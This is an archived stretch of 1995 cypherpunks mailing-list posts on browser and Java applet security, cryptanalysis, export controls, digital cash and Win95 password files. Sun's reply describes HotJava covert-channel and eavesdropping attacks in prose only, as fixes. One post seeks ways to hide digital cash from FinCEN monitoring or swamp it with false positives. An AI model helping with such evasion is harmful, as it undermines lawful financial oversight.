I am not nearly so *SLOW* as to offer you ammunition to use against me. Your license agreement -- pardon me -- Netscape's license agreement explicitly sets out the limitations under which I must function. An agreement, I respect. It states in part.

> RESTRICTED USE. You may not copy the software, except for backup or
> archival purposes. Any such copy made by you shall be subject to this
> Agreement and shall contain all of Netscape's notices regarding
> copyrights, trademarks and other proprietary rights as contained in the
> Software originally provided to you. You may not lend, rent, lease or
> otherwise transfer the Software. The Software is protected by the
> copyright laws of the United States and international copyright
> treaties.

Ya see ... "Jeff" ... I actually respect that ... and I'll operate within those constraints on this one.

Later the Agreement continues with more legalistic boiler plate and says,

> TITLE. Title, ownership rights, and intellectual property rights in
> and to the Software and Documentation shall remain in Netscape and/or
> its suppliers. This Agreement does not include the right to sublicense
> the Software and is personal to you and therefore may not be assigned
> (by operation of law or otherwise) or transferred without the prior
> written consent of Netscape. You acknowledge that the Software in
> source code form remains a confidential trade secret of Netscape and/or
> its suppliers and therefore you agree not to attempt to decipher,
> decompile, disassemble or reverse engineer the Software or allow others
> to do so, except to the extent applicable laws specifically prohibit
> such restriction. You further agree not to modify or create derivative
> works of the Software.

Now how do you expect me ... poor little "Alice" ... to exploit KNOWN documented and undocumented security holes in Netscape Navigator ...
holes which Netscape willfully and deliberately or alternatively through the grossest of negligence, engineered into the product, when I have implicitly agreed not to violate your License Agreement.

My hands are kind of tied, aren't they "Jeff".

I need written permission to do that, and considering that Netscape hasn't even *bothered* to acknowledge email which was sent to them, email which asked whether they will voluntarily open up their experimental MIME objects to IETF review, I somehow doubt that permission will be forthcoming.

You can't suck and blow at the same time Jeff.

Maybe, what I'll do ... is snail mail Netscape and ask for explicit permission to do just that. I'll also ask for access to all of the source code, and maybe at the same time ask for the email address of Dr James H. Clark, since the Netscape postmaster doesn't seem to reply to email.

After all, he DOES know about this issue, doesn't he?? Dr. James H. Clark has been briefed, I hope ...

Let's see ... Dr. James H Clark, founder of Silicon Graphics Inc, and co-founder of Netscape Communications Corp. does know about this "itsy bitsy" "teeny-weeny" problem doesn't he?? I mean there _will_ be questions as to what he knew and when he knew it and what he did about it. But that'll be his baby ... and I'll let him speak for himself on that one.

But the other question ... the question of what the other co-founder of Netscape Communications Corp., Marc Andreessen, knew is not a subject for speculation. We know that. Marc Andreessen, vice-president of technology at Netscape, and creator of NCSA Mosaic's knowledge is clear. We "know" what Marc knew. Marc won't be able to pull an "Ollie North" and redact the public domain electronic archives.

It's clear what he knew and when he knew it. A simple one line command tells all ...
a command like, maybe:

    mget rfc* |grep Andreessen

run at one of the public domain archives might give us some clues and pointers to anyone who might be familiar with how the net works. Then a little follow up and search of some mailing lists ... lists of the Internet Engineering Task Force ... cross-referencing the records of the IETF might tell us what Marc knew and when.

NOTHING which has been written, is gone, is it Jeff?? There are no hidden acts, and there are no solitary acts when it comes to the Network. And isn't that a shame, "Jeff"??

But then what would I know about such things ... I don't *understand* the technology, do I "Jeff", my boy??

Simple question, once again ... does Netscape have any comment to make? Or does it continue to say "no comment". Will Dr. James H. Clark, and/or Marc Andreessen please step forward and address this issue at this time?

The international community is beginning to lose its patience.

> --Jeff
>
> --
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw at netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.

Alice de 'nonymous ...
...just another one of those...

P.S. This post is in the public domain.

C. S. U. M. O. C. L. U. N. E.

From stevenw at best.com Tue Nov 14 03:20:18 1995
From: stevenw at best.com (Steven Weller)
Date: Tue, 14 Nov 1995 19:20:18 +0800
Subject: Java security (reposted from RISKS)
Message-ID:

------------------------------

Date: Fri, 10 Nov 1995 15:45:00 -0800
From: Marianne.Mueller at eng.sun.com (Marianne Mueller)
Subject: regarding Java security

This response was recently posted to comp.lang.java.

Marianne Mueller, Java Products Group, Sun Microsystems, Inc.
Article 4356 of comp.lang.java:
Path: handler.Eng.Sun.COM!puffin.Eng.Sun.COM!mrm
>From: mrm at puffin.Eng.Sun.COM (Marianne Mueller)
Newsgroups: comp.lang.java
Subject: Re: PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE
Date: 9 Nov 1995 00:50:27 GMT
Organization: Sun Microsystems, Inc. Mt. View, Ca.
Keywords: alpha3 hotjava security

The paper written by the two students at Princeton describes possible attacks on the alpha3 HotJava browser, which have all been fixed in JDK beta. Granted, until this week, the source code for JDK beta wasn't available, so it's understandable that they analyzed the alpha3 source base.

We understand people need more information on the security model, and we're taking time right now to document the security story more rigorously. A security FAQ, an updated whitepaper, detailed user documentation and detailed implementor's documentation are all being worked on.

The Java security mechanisms include:

Java language mechanisms
  * no pointers
  * private interfaces, classes and methods
  * class loader that enforces namespace divisions
  * runtime byte code verifier that enforces language type rules and name space divisions

Browser mechanisms, used by JDK beta appletviewer and by Netscape Navigator 2.0beta
  * AppletSecurity: extends java.lang.SecurityManager; strict applet checks
  * AppletClassLoader: extends java.lang.ClassLoader; strict class loading

The goal for JDK beta is to enable browsers to run untrusted applets in a trusted environment. The approach is to be conservative at first, and to add functionality when it can be added securely. So, JDK beta applets (and Netscape 2.0beta applets) may not do the following.

1. Files: Access Control Lists are greatly restricted in beta, as compared to the situation in the alpha3 HotJava browser. ACLs are initialized - only once - by the applet security manager, and are not user configurable.
   For a file not on the access control list, an applet cannot
   - check for the existence of the file
   - read the file
   - write the file
   - check the file type
   - check if the file is a directory
   - check the timestamp when the file was last modified
   - check the file's size
   - create a directory
   - rename the file
   - list the files in this file (as if it were a directory)

   Applets cannot
   - create a FileInputStream
   - create a RandomAccessFile, either for reading or writing
   - Open file descriptors

2. Sockets: Applets cannot
   - Create socket connections other than to its own host
   - Create a socket factory

3. Loading/linking: Applets cannot
   - Create class loaders
   - Access a package in the sun.* hierarchy
   - Define a new class in the java.* hierarchy
   - Link dynamic libraries using System.loadLibrary()
   - Disable or override the AppletSecurityManager

4. Process control: Applets cannot
   - Define native methods
   - Fork processes
   - Manipulate threads or thread groups outside of the applet's thread group
   - Exit the virtual machine (e.g., the browser or the appletviewer)

5. awt: Applets cannot
   - Create toplevel windows that don't have a warning banner

Applets can use network connections only to connect to the host they originate from, to download files that are part of the applet's implementation. Those files might be java bytecode class files, or they might be input files used by the applet (GIF, JPEG, audio, other data files.)

Taking a look at the specific attacks mentioned in the paper -

    alpha3 HotJava                    JDK
    ----------------------            ---

1.  socket accept() and               applets cannot use
    listen() aren't protected         accept() and listen()
    adequately, allowing a
    browser to eavesdrop

2.  applets can connect to            applets cannot connect
    the SMTP (mail) port on           to the SMTP port on
    some web server and use           the computer the applet
    that as a covert channel          is visiting

3.  InetAddress.getByName()           applets cannot use
    is public and does not            InetAddress to inquire
    check the security mode           about hosts they are
    before making DNS request         not already allowed to
                                      connect to

4.  applets can use DNS to            applets may not get the
    create a covert channel           internet address of any host

5.  Access Control Lists (ACLs)       ACLs are greatly restricted
    for reading and writing           in JDK beta.
    files are not strict enough       Reading/writing files is
                                      disabled for web browsers,
                                      such as Netscape Navigator 2.0.

6.  applets can use the               System.getenv() is obsolete
    System.getenv() method            and is not part of the JDK
    to gather information about       API
    the computer that it is
    running on

7.  applets can change the            applets cannot read or alter
    property manager database         client properties

8.  applets can change the            The fields that hold the
    HTTP and FTP proxy server         HTTP and FTP proxy names
                                      are private. The values
                                      are stored in a property
                                      manager database that an
                                      applet cannot read or write.

It's very difficult, if not impossible, for a web browser to completely prevent denial of service attacks. The JDK applet API doesn't claim to prevent denial of service attacks.

A "denial of service" attack is where someone writes an applet whose goal is to consume all available resources on your computer, forcing you to kill the browser you're running. For example, someone could write an applet that creates a million pop-up windows. The windows don't do anything, but creating a million of them might use up all the virtual memory on your computer and you'd have to kill the web browser to reclaim the virtual memory.

Before people engage in too much wailing and gnashing of teeth about how applets have been too severely restricted -

We want to enable applets to do interesting things, including making socket connections, and reading and writing to the file system. One way to enable that is to use a signed class loader.
When a trusted applet is loaded, then the applet could be granted permission to do some of the things they are prevented from doing by default.

The goal is to ensure that untrusted applets can't steal or damage information on a computer running a Java-enabled browser. Later, we can allow trusted applets to do things that untrusted applets are not allowed to do. Since an implementation bug in a trusted applet could open a loophole that could be exploited by an untrusted applet, design matters.

Marianne
Java Products Group
http://java.sun.com/people/mrm/

------------------------------

-------------------------------------------------------------------------
Steven Weller       | "The Internet, of course, is more
+1 415 390 9732     | than just a place to find pictures
                    | of people having sex with dogs."
stevenw at best.com | -- Time Magazine, 3 July 1995

From JMKELSEY at delphi.com Tue Nov 14 03:37:59 1995
From: JMKELSEY at delphi.com (JMKELSEY at delphi.com)
Date: Tue, 14 Nov 1995 19:37:59 +0800
Subject: No Subject
Message-ID: <01HXMG5BM8V699JE2Z@delphi.com>

-----BEGIN PGP SIGNED MESSAGE-----

>Date: Fri, 10 Nov 1995 11:52:41 -0800
>From: Bill Stewart
>Subject: Re: coding and nnet's

>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>cryptography, primarily because of the shape of the solution space.
>Neural nets work best for problems that have a continuity of
>solutions, some better than others. This allows a neural net to
>learn, proposing better and better solutions as it does. Breaking an
>algorithm provides for very little in the way of learning
>opportunities: You either recover the key or you don't. (At least
>this is true if the algorithm is any good.)

Has anyone tried using neural nets or similar techniques for searching for useful nonrandom properties of the round functions of block ciphers or hash functions?
This might be useful in trying to prepare some new kind of attack, find a balanced binary function that is useful in using the generalization of linear cryptanalysis discussed by Harpes, Kramer, and Massey at Eurocrypt '95, find a better "difference" function for use in a differential attack, etc.

>Neural nets work well
>in structured environments when there is something to learn, but not
>in the high-entropy, seemingly random world of cryptography." And he
>doesn't give any references.

Merkle's paper on Khufu and Khafre addresses this idea, I think. Merkle comments that it's not going to be useful against a full cipher, but that it might be useful against (say) Khufu with one or two octets.

># Thanks; Bill
># Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
># Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

Note: Please respond via e-mail as well as or instead of posting, as I get CP-LITE instead of the whole list.

--John Kelsey, jmkelsey at delphi.com
PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

From daw at delhi.CS.Berkeley.EDU Tue Nov 14 04:28:26 1995
From: daw at delhi.CS.Berkeley.EDU (David A Wagner)
Date: Tue, 14 Nov 1995 20:28:26 +0800
Subject: coding and nnet's
Message-ID: <199511122205.RAA24984@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <199511111800.NAA23831 at jekyll.piermont.com>, Perry E. Metzger wrote:
>
> > Perhaps neural nets could be used in an unknown plain text, brute force
> > attack to automatically select possible decryptions for human examination.
> > I don't know of any papers on the subject.
>
> I remember seeing a good paper by our own David Wagner on how to do
> this without anything more than some ordinary statistics -- no
> complicated junk required. David, if you are reading this, could you
> comment?
>

Check out http://www.cs.berkeley.edu/~daw/recog.ps for a paper by Steve Bellovin & me on doing plaintext recognition with ordinary statistics. It has nothing to do with neural networks, though....

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From an407769 at anon.penet.fi Tue Nov 14 04:29:33 1995
From: an407769 at anon.penet.fi (jerry the golden retriever)
Date: Tue, 14 Nov 1995 20:29:33 +0800
Subject: ecash in pcweek
Message-ID: <9511122125.AA09326@anon.penet.fi>

Opinion: Digital Cash Takes Step Toward Reality

From PC Week for November 13, 1995 by Bill Machrone

Some people are always looking for new ways to make money. Other people are always looking for new ways to spend money. They're running headlong into one another on the Internet.

Most of the digital cash and electronic commerce schemes out there are still in their infancy, but many of them are predicated on making a transaction fee off the people who want to buy things in this new, electronic medium.

Making money from people spending money is hardly a shocking proposition. But all the approaches that call themselves any kind of "cash" are stretching the definition. To the best of my knowledge, cash is the thing you can spend without having it costing you a cent, so to speak.

The only way you'll see digital cash without transaction costs is if a powerful but paternalistic ruling body gets into the business.
That doesn't mean if Microsoft builds it into the operating system, but rather if the government gets involved and makes some form of electronic money transfer legal tender, and therefore immune to fiscal encumbrances. This isn't remotely close to happening, so don't get your hopes up. Meanwhile, things are getting pretty interesting in the real world of digital-cash transactions. Digicash (www.digicash.com) has partnered with the Mark Twain Bank to offer online shoppers a debit card-like "E- cash" account that they can fill with real money and then use either in normal purchases or microtransactions from vendors who accept E-cash. You pay a combination of setup fees, monthly fees, and money-movement fees, but the overall goal is to make the transactions painless, transparent, and anonymous. The anonymity factor is a key component of real cash and a design requirement of Digicash. It's extremely unlikely that anyone could spoof the system and spend your money; yet you can re- create your E-cash on your own machine if you have a disk crash. Portland Software (www.portsoft.com) has also attacked the issue, putting itself in the position of vendors who want to sell things electronically. Its approach, called ZipLock, is suited to selling software products on the spot but is also suitable for published content, artistic images, and fonts. It approves your credit and goes through an unlocking/decrypting routine on the spot. The ZipLock transaction is much more like a normal credit-card transaction and in fact uses the communications infrastructure built by a major credit-card clearinghouse. In effect, it transforms your PC into a point-of-sale terminal, where all you have to do is enter your credit-card number. If you're ordering software or other electronically deliverable goods, they're transmitted and decrypted on the spot. Other merchandise is delivered via the usual direct-marketing vehicles. 
Fees are paid by the merchant, which means that the transaction cost is built into the price. Although E-cash and ZipLock are hardly the only two electronic-payment schemes out there, their differences are instructive. Each appears to have a significant, valid role in building consumer confidence in online commerce. Bill Machrone is vice president of technology for Ziff-Davis Publishing Co. He can be reached at wmachrone (MCI Mail) or 72241,15 (CompuServe). --****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION*** Your e-mail reply to this message WILL be *automatically* ANONYMIZED. Please, report inappropriate use to abuse at anon.penet.fi For information (incl. non-anon reply) write to help at anon.penet.fi If you have any problems, address them to admin at anon.penet.fi From rsalz at osf.org Tue Nov 14 04:56:22 1995 From: rsalz at osf.org (Rich Salz) Date: Tue, 14 Nov 1995 20:56:22 +0800 Subject: Getting the ITAR Message-ID: <9511140421.AA12502@sulphur.osf.org> The front of the ITAR has this convenient phone number you can call to get a copy: 1 703 875 6644. I don't think anyone on this list can claim ignorance. :) BTW, as for Pegasus, please note that I didn't say the author was going to get in trouble, merely that his software is export controlled -- there's a difference. /r$ From llurch at networking.stanford.edu Tue Nov 14 04:58:51 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Tue, 14 Nov 1995 20:58:51 +0800 Subject: Password File Utility Wanted [Win95, ha ha] In-Reply-To: <48888p$970@news.infi.net> Message-ID: <199511140428.UAA03630@Networking.Stanford.EDU> (A copy of this message has also been posted to the following newsgroups: comp.os.ms-windows.win95.misc, alt.security,comp.security.misc) -----BEGIN PGP SIGNED MESSAGE----- In article <48888p$970 at news.infi.net>, lestat at richmond.infi.net (Terry Harrison) wrote: >I would like to obtain a program to address the following..... 
> >I use the 'remember password' option on my network logins, and then >when they expire, I don't remember what they were. This is bad as I >need them to change the old password (particularly a problem with >Netware). What I would like is a utility that would prompt me for my >current windows ID for security, then decode the .pwl files so that I >could read my old passwords. Ideally, it would allow an edit of the >existing passwords as well. Anybody seen onea these?? Such a thing could exist, because Win95 allows you to save passwords that use different encryption methods. Microsoft would say "no, doesn't exist," however, because this is a major security flaw. I haven't seen such a tool, though. Anybody? What you should do is get a real encryption package like PGP (poke around on http://web.mit.edu/ or http://www.netresponse.com/zldf/, it's free), use something that is long and complicated but that you will never ever forget as your PGP passphrase, and encrypt a text file containing all of your passwords with PGP. You can put other stuff like all your credit card numbers in a PGP-encrypted file with reasonable safety too. You (only) will be able to decrypt and read this file whenever you want. -- rich graves, llurch at networking.stanford.edu moderator of the win95netbugs list http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html From EALLENSMITH at ocelot.Rutgers.EDU Tue Nov 14 06:43:47 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E.
ALLEN SMITH) Date: Tue, 14 Nov 1995 22:43:47 +0800 Subject: coding and nnet's Message-ID: <01HXM96ZFRDC8WXWOV@mbcl.rutgers.edu> From: tcmay at got.net 13-NOV-1995 02:25:05.47: At 11:40 PM 11/11/95, Michael Pierson wrote: >I wouldn't be surprised to learn of somebody like FinCEN using >neural-net systems to do pattern analysis on funds transfers and >the like, or the NRO or NSA investing research money into >investigating the usefulness of NNs for image processing or for >scanning raw ELIN SIGINT or COMINT data. In fact, I'd be quite >surprised if they weren't. [...] I recall reading of some contracts let out, and other RFCs, for AI programs for FinCEN use. Not surprising. (If I ran FinCEN, this is what I'd surely have a bunch of folks working on. Scary thought.) ------------------------ I find it interesting that FinCEN has a net link (at http://www.ustreas.gov/treasury/bureaus/fincen/fincen.html). I have heard about an IRS cash-tracking center in Detroit, where all those $100+ cash deposits/withdrawals get sent. They probably use similar setups for analysis, although with more of an individual focus. I have recently been contemplating how a private digital cash system (either national-currency based or private-currency based) would show up on such an analysis process. My suspicion is that it would do so via fewer known non-cash transfers. Cash transactions might actually increase, due to conversions between digital cash and normal cash. On the other hand, many of those using a private digital cash scheme may (like myself) tend to use mostly cash anyway. I am interested in hearing the thoughts of others on this subject. Particularly useful would be methods to stealth or spoof such a system; i.e., to either hide a private digital cash system from it, or to give it so many false positives that they couldn't distinguish what is real and what is not. I suggest that the latter would be easier (and would have other valuable applications). -Allen P.S. 
Does anyone know what is up with the extropians list? Down again, I suspect. From gjeffers at socketis.net Tue Nov 14 07:28:27 1995 From: gjeffers at socketis.net (Gary Jeffers) Date: Tue, 14 Nov 1995 23:28:27 +0800 Subject: U.S. Exit Tax - SI Message-ID: <199511141046.EAA18231@mail.socketis.net> U.S. EXIT TAXES from Strategic Investment's Intelligence bulletins - November 15, 1995 Strategic Investment 824 E. Baltimore St. Baltimore, MD 21202-4799 Published monthly for U.S. residents at US$109 per year. Republicans add barbed wire to Clinton's "Berlin Wall." SI accurately forecasted the coming of the "exit" tax proposed by the Clinton Administration earlier this year. Now Senate Republicans have passed an exit tax that is even more punitive than that proposed by Clinton. Section 12441(b) of the Balanced Budget Reconciliation Act of 1995 (H.R. 2491) adds a new layer of confiscatory taxes, succession taxes, to be imposed upon U.S. citizens and residents. Unlike gift or estate taxes, which are imposed upon the giver or his estate, succession taxes are imposed upon the recipient of bequests. Under the Senate proposal, succession taxes would be levied upon property acquired by gift or inheritance from a former U.S. citizen or former long-term resident of the U.S. who leaves U.S. tax jurisdiction after February, 1995. This tax would make it financially more punitive for an American to renounce his citizenship unless his entire family came along. It would also make it unattractive for foreigners with close U.S. relatives to take up residence in the United States. They would be subject to confiscatory exit taxes upon leaving. (Questions arise - is there any legislation that Congress can't pass or attempt to pass? Aren't Republicans supposed to be an alternative to Democrats?)
- GLJ  From s1113645 at tesla.cc.uottawa.ca Tue Nov 14 09:12:41 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Wed, 15 Nov 1995 01:12:41 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. Message-ID: I just found this tidbit while following Sameer's Apache WWW server link. For those who were wondering if plug-in crypto hooks were still watched out for. One wonders how the ietf folks are managing to promote internet-wide standards that are considered unexportable (Are they? What's the deal on photuris, PEM, ipsec and the rest of them?) Ps. I may be totally wrong, but I remember seeing something posted last month about some ZKIPS scheme in relation with Netscape (zero knowledge proofs with web servers, huh? Confused). ----------------------------------------------------------------------- [IMAGE] WHY WE TOOK PEM OUT OF APACHE On May 17th, 1995, we were asked by a representative of NCSA to remove any copies of NCSA httpd prior to 1.4.1 from our web site. They were mandated by the NSA to inform us that redistribution of pre-1.4.1 code violated the same laws that make distributing Phill Zimmerman's PGP package to other countries illegal. There was no encryption in NCSA's httpd, only hooks to publicly available libraries of PEM code. By the NSA's rules, even hooks to this type of application is illegal. Because Apache is based on NCSA code, and we had basically not touched that part of the software, we were informed that Apache was also illegal to distribute to foreign countries, and advised (not mandated) by NCSA to remove it. So, we removed both the copies of the NCSA httpd we had, and all versions of Apache previous to 0.6.5. The Apache members are strong advocates of the right to digital privacy, so the decision to submit to the NSA and remove the code was not an easy one. Here are some elements in our rationale: * The PEM code in httpd was not widely used. 
No major site relied upon its use, so its loss is not a blow to encryption and security on the world wide web. There are other efforts designed to give much more flexible security - SSL and SHTTP - so this wasn't a function whose absence would really be missed on a functional level. * We didn't feel like being just a couple more martyrs in a fight being fought very well by many other people. Rather than have the machine that supports the project confiscated or relocated to South Africa, etc., we think there are more efficient methods to address the issue. It kind of sickens us that we had to do it, but so be it. Patches that re-implement the PEM code may be available at a foreign site soon. If it does show up, we'll point to it - that can't be illegal! Finally, here is a compendium of pointers to sites related to encryption and export law. We can't promise this list will be up to date, so send us mail when you see a problem or want a link added. Thanks. * Yahoo - Science: Mathematics: Security and Encryption * EFF Crypto/Privacy/Security Archive * Crypto page at Quadralay * Cryptography Export Control Archives (Cygnus) * ICLU - Your Rights in Cyberspace Brian, brian at hyperreal.com From eay at mincom.oz.au Tue Nov 14 09:15:26 1995 From: eay at mincom.oz.au (Eric Young) Date: Wed, 15 Nov 1995 01:15:26 +0800 Subject: 4096 bit strong prime for Diffle-Hellman In-Reply-To: Message-ID: On Tue, 14 Nov 1995, Eric Young wrote: > Even if the private DH values are pre-calculated, this will only halve the > time of the DH operation and if this is done it loses the advantage of DH > in that if the private/public pair are 'generated on the fly', > pre-recorded session will not be able to be decoded if the private key is Urk, that reads very badly; what I meant is that since a different public/private key is used per session, if a private key is revealed, any previous and future communication between the 2 entities is not compromised, only the particular session using that
public/private key pair. Also since the key pair is generated on the fly, they don't need to be recorded on disk etc, so the only way to get the private key is to 'hack' the application at runtime (or modify it in advance). eric (who is having a bad day converting his thoughts to English...). From perry at piermont.com Tue Nov 14 09:15:46 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 15 Nov 1995 01:15:46 +0800 Subject: U.S. Exit Tax - SI In-Reply-To: <199511141046.EAA18231@mail.socketis.net> Message-ID: <199511141326.IAA05233@jekyll.piermont.com> This is really not cypherpunks material at all. Post this sort of thing to "Libernet", not to cypherpunks. .pm Gary Jeffers writes: > U.S. EXIT TAXES > from Strategic Investment's Intelligence bulletins - November 15, 1995 > > Republicans add barbed wire to Clinton's "Berlin Wall." SI accurately > forecasted the coming of the "exit" tax proposed by the Clinton Administration > earlier this year. Now Senate Republicans have passed an exit > tax that is even more punitive than that proposed by Clinton. Section From vitamin at best.com Tue Nov 14 09:16:41 1995 From: vitamin at best.com (vitamin) Date: Wed, 15 Nov 1995 01:16:41 +0800 Subject: unsubcribe Message-ID: <199511141535.HAA01352@blob.best.net> unsubcribe From lbowen at eznet.net Tue Nov 14 09:17:39 1995 From: lbowen at eznet.net (Lloyd Bowen) Date: Wed, 15 Nov 1995 01:17:39 +0800 Subject: BBS Generator Code Needed Message-ID: <199511141529.KAA04080@shell1.eznet.net> Does anyone have 'C' code for the Blum-Blum-Shub PRN Generator handy? I would rather not have to write it myself if there is tested code available. --8^} Thanks ====================================================================== Lloyd Bowen Paychex, Inc.
E-Mail to: lbowen at eznet.net ====================================================================== From jya at pipeline.com Tue Nov 14 09:37:44 1995 From: jya at pipeline.com (John Young) Date: Wed, 15 Nov 1995 01:37:44 +0800 Subject: FKI_osk Message-ID: <199511141703.MAA01329@pipe2.nyc.pipeline.com> 11-14-95. Washrag: "FBI Targets Expected Growth In Computer Crime." The FBI is beefing up its fight against computer crime. A Washington office, which handles international cases, was established in 1993. The San Francisco office will keep a close eye on activities in Silicon Valley, while the New York squad will handle financial-related computer crimes. "Postal Service Planning to Sell Prepaid Telephone Cards." Because the phone cards are "stored value cards," they could offer the Postal Service a logical first step toward the use of a "smart card" that might be used in connection with an information kiosk the agency is developing for the federal government to provide the public with a computer link to the federal bureaucracy. Long-range plans for the kiosk call for use of smart cards that would enable people to receive government payments, such as welfare benefits or checks for food stamps. FKI_osk (7 kb) From dmacfarlane at zip.sbi.com Tue Nov 14 10:28:24 1995 From: dmacfarlane at zip.sbi.com (David Macfarlane) Date: Wed, 15 Nov 1995 02:28:24 +0800 Subject: BBS Generator Code Needed Message-ID: <9511141749.AA28423@zip_master2.sbi.com> > Does anyone have 'C' code for the Blum-Blum-Shub PRN Generator handy? I > would rather not have to write it myself if there is tested code available. > --8^} > > Thanks > ====================================================================== > Lloyd Bowen > Paychex, Inc. > E-Mail to: lbowen at eznet.net > ====================================================================== Wei Dai's crypto++ has BBS, if you can find a copy. David. 
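An added illustration for the Blum-Blum-Shub request in this thread (not code posted by any list member and not taken from Wei Dai's Crypto++): a toy generator in C that squares the state modulo n = p*q and emits the low bit, rejecting non-Blum primes and seeds that fall into a fixed point. The names `bbs_t`, `bbs_init`, `bbs_next_bit` and `bbs_fill` and the 32-bit prime limit are assumptions of this sketch; real use needs large secret primes and a multi-precision library.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Toy Blum-Blum-Shub: x_{i+1} = x_i^2 mod n, output = low bit of x_{i+1}.
 * Names and parameter sizes are illustrative assumptions, not from the thread. */
typedef struct {
    uint64_t n;   /* modulus n = p * q; its factors must stay secret in real use */
    uint64_t x;   /* current state */
} bbs_t;

enum { BBS_OK = 0, BBS_ERR_NOT_PRIME = -1, BBS_ERR_NOT_BLUM = -2, BBS_ERR_BAD_SEED = -3 };

static uint64_t gcd_u64(uint64_t a, uint64_t b)
{
    while (b != 0) { uint64_t t = a % b; a = b; b = t; }
    return a;
}

/* (a * b) mod n by double-and-add, so no intermediate overflows; needs a, b < n. */
static uint64_t mulmod(uint64_t a, uint64_t b, uint64_t n)
{
    uint64_t r = 0;
    while (b != 0) {
        if (b & 1)
            r = (r >= n - a) ? r - (n - a) : r + a;
        a = (a >= n - a) ? a - (n - a) : a + a;
        b >>= 1;
    }
    return r;
}

/* Trial division is enough for the toy 32-bit primes used here. */
static int is_prime_u32(uint32_t v)
{
    if (v < 2) return 0;
    if (v % 2 == 0) return v == 2;
    for (uint64_t d = 3; d * d <= v; d += 2)
        if (v % d == 0) return 0;
    return 1;
}

/* Set up the generator. p and q must be distinct primes congruent to 3 mod 4
 * (Blum primes); the seed must be coprime to n and must not square to 1,
 * otherwise the state is stuck at 0 or 1 and every output bit is constant. */
int bbs_init(bbs_t *g, uint32_t p, uint32_t q, uint64_t seed)
{
    if (p == q || !is_prime_u32(p) || !is_prime_u32(q)) return BBS_ERR_NOT_PRIME;
    if (p % 4 != 3 || q % 4 != 3) return BBS_ERR_NOT_BLUM;
    uint64_t n = (uint64_t)p * q;
    uint64_t s = seed % n;
    if (gcd_u64(s, n) != 1) return BBS_ERR_BAD_SEED;     /* catches 0 and multiples of p or q */
    if (mulmod(s, s, n) == 1) return BBS_ERR_BAD_SEED;   /* catches the square roots of 1 */
    g->n = n;
    g->x = s;
    return BBS_OK;
}

/* Advance one step and return the least significant bit of the new state. */
int bbs_next_bit(bbs_t *g)
{
    g->x = mulmod(g->x, g->x, g->n);
    return (int)(g->x & 1);
}

/* Fill a buffer, packing eight successive output bits per byte, first bit highest. */
void bbs_fill(bbs_t *g, uint8_t *out, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        uint8_t byte = 0;
        for (int b = 0; b < 8; b++)
            byte = (uint8_t)((byte << 1) | bbs_next_bit(g));
        out[i] = byte;
    }
}

int main(void)
{
    bbs_t g;
    /* Constructed toy parameters: p = 11, q = 23, seed = 3 (n = 253). */
    if (bbs_init(&g, 11, 23, 3) != BBS_OK) return 1;
    for (int i = 0; i < 6; i++) printf("%d", bbs_next_bit(&g));
    printf("\n");
    return 0;
}
```

With the constructed parameters the state runs 9, 81, 236, 36, 31, 202, a sequence that only makes sense for checking the arithmetic; a modulus this small is trivially factored.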
From jeffb at sware.com Tue Nov 14 10:34:08 1995 From: jeffb at sware.com (Jeff Barber) Date: Wed, 15 Nov 1995 02:34:08 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. In-Reply-To: Message-ID: <199511141758.MAA14695@jafar.sware.com> s1113645 at tesla.cc.uottawa.ca writes: > For those who were wondering if plug-in crypto hooks were still watched > out for. One wonders how the ietf folks are managing to promote internet-wide > standards that are considered unexportable (Are they? What's the deal on > photuris, PEM, ipsec and the rest of them?) > WHY WE TOOK PEM OUT OF APACHE > > On May 17th, 1995, we were asked by a representative of NCSA to remove > any copies of NCSA httpd prior to 1.4.1 from our web site. They were > mandated by the NSA to inform us that redistribution of pre-1.4.1 code > violated the same laws that make distributing Phill Zimmerman's PGP > package to other countries illegal. There was no encryption in NCSA's > httpd, only hooks to publicly available libraries of PEM code. By the > NSA's rules, even hooks to this type of application is illegal. Does anyone know the ostensible justification for this? What section of the ITARs do they point to when they say "this is illegal"? I've perused an online copy of ITAR (no, I haven't read all of it -- I have other things I want to do this year :-), but I can't find a section that could be construed to support this contention. -- Jeff From ylo at cs.hut.fi Wed Nov 15 03:41:48 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Wed, 15 Nov 95 03:41:48 PST Subject: NSA, ITAR, NCSA and plug-in hooks. In-Reply-To: <199511141758.MAA14695@jafar.sware.com> Message-ID: <199511142016.VAA00818@trance.olari.clinet.fi> >> For those who were wondering if plug-in crypto hooks were still watched >> out for. One wonders how the ietf folks are managing to promote internet-wide >> standards that are considered unexportable (Are they? What's the deal on >> photuris, PEM, ipsec and the rest of them?) 
